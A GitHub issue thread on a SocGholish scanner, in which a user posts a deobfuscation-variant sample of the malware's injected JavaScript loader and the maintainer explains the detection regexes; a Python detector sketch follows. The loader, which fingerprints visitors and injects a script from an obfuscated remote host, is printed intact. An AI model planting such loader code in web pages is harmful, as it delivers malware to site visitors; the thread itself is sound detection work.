lasq88 / socgholish_finder


Different iteration #1

Open joshnck opened 1 year ago

joshnck commented 1 year ago

I found a different iteration of SocGholish in the wild that uses a %2 function to deobfuscate itself rather than the Base64 method you are identifying:

```javascript
(function () {
  var oi = document.referrer;
  var fb = window.location.href;
  var gy = navigator.userAgent;
  // bz() decodes this to a regex that captures the host part of a URL
  var sq = new RegExp(bz('l:b/x/x(t[v^b/z]i+d)c/t'));
  // bail out if there is no referrer, the referrer host equals this page's host,
  // the user agent is not Windows, or a localStorage marker is already set
  if (!oi || fb.match(sq)[1] == oi.match(sq)[1] || gy.indexOf(bz('rWrienudoolwisj')) == -1 || window.localStorage[bz('z_q_w_tuutqmhai')]) {
    return;
  }
  var cx = bz('fsycdrkizpqtt'); // 'script'
  var fe = document.createElement(cx);
  fe.async = true;
  fe.src = bz('ahststqpqsk:s/z/kakucchtjirosnx.fwqofnwdlewrlwrobmdacntqpuniglftksu.pcmonmo/yrheapsosrktv?wrn=pdejs1miiZojuctzdNizogkxtMqjoUj1jNp2jYtxgNajpgxznMyDyIv2jMvyaZojvaxWzQa9qMgjvYd5i');
  var sg = document.getElementsByTagName(cx)[0];
  sg.parentNode.insertBefore(fe, sg);
  // %2 routine: keep only the characters at odd indices of the input
  function bz(ft) {
    var sw = '';
    for (var vn = 0; vn < ft.length; vn++) {
      if (vn % 2) {
        sw += ft[vn];
      }
    }
    return sw;
  }
}());
```

As such, this would go undetected with your scanner :)

lasq88 commented 1 year ago

Thanks. The scanner is actually trying to match both base64-obfuscated strings as well as %2-obfuscated strings; it also has 2 regexes that should match injected code no matter the obfuscation routine. If you look at the screenshot provided in the readme file, it actually references a sample obfuscated with %2 obfuscation.

I checked, and the code provided by you should match 1 out of 3 indicators (to be precise, it matches the .W.i.n.d.o.w.s. regex). It's still an interesting sample, as it wouldn't match the two more generic regexes due to some different formatting of the code. I will fix this, thank you!
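A small detector in the spirit of the two matching strategies described above, added here as an example and not the project's own code: it reproduces the sample's bz() decoding (trying both index parities), and applies interleaved-character regexes modelled on the .W.i.n.d.o.w.s. indicator. The indicator word list, the helper names and the sample snippet (with a placeholder URL) are constructed assumptions.

```python
import re

# Indicator words to look for once the %2 padding is stripped. "Windows" is the
# ".W.i.n.d.o.w.s." indicator mentioned above; the others are assumptions.
INDICATOR_WORDS = ("Windows", "script", "https://", "localStorage")

def interleaved_regex(word):
    """'Windows' -> /.W.i.n.d.o.w.s/: each real character preceded by one junk char."""
    return re.compile("".join("." + re.escape(c) for c in word))

INDICATORS = {w: interleaved_regex(w) for w in INDICATOR_WORDS}

# Single- or double-quoted JS string literal, tolerant of escaped quotes.
STRING_LITERAL = re.compile(r"""(["'])((?:\\.|(?!\1).)*)\1""")

def decode_mod2(s, keep_odd=True):
    """Reproduce the sample's bz(): keep every second character (odd indices by default)."""
    return s[1::2] if keep_odd else s[0::2]

def encode_mod2(s, junk="x"):
    """Inverse of decode_mod2, used only to build test data: one junk char before each real char."""
    return "".join(junk + c for c in s)

def scan(js):
    """Return (indicator names matched in the raw text, decoded literals that carry an indicator)."""
    raw_hits = {w for w, rx in INDICATORS.items() if rx.search(js)}
    decoded_hits = []
    for m in STRING_LITERAL.finditer(js):
        for keep_odd in (True, False):  # tolerate a variant that keeps even indices instead
            plain = decode_mod2(m.group(2), keep_odd)
            if any(w in plain for w in INDICATOR_WORDS):
                decoded_hits.append(plain)
    return raw_hits, decoded_hits

# Constructed sample mimicking the loader's shape; the URL is a placeholder, not a real indicator.
SAMPLE = (
    "(function(){if(navigator.userAgent.indexOf(bz('rWrienudoolwisj'))==-1){return;}"
    "var cx=bz('fsycdrkizpqtt');var fe=document.createElement(cx);fe.async=true;"
    "fe.src=bz('" + encode_mod2("https://example.invalid/report?r=1") + "');"
    "function bz(ft){var sw='';for(var vn=0;vn<ft.length;vn++){if(vn%2){sw+=ft[vn];}}return sw;}}());"
)

if __name__ == "__main__":
    hits, decoded = scan(SAMPLE)
    print("raw-text indicators:", sorted(hits))
    print("decoded literals:", decoded)
```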

joshnck commented 1 year ago

You are right - and I tested this against a domain I know is infected and I was able to detect stage 1. Unfortunately stage 2 is down and I wasn't able to go further.

An additional feature that would be nice is a verbose mode!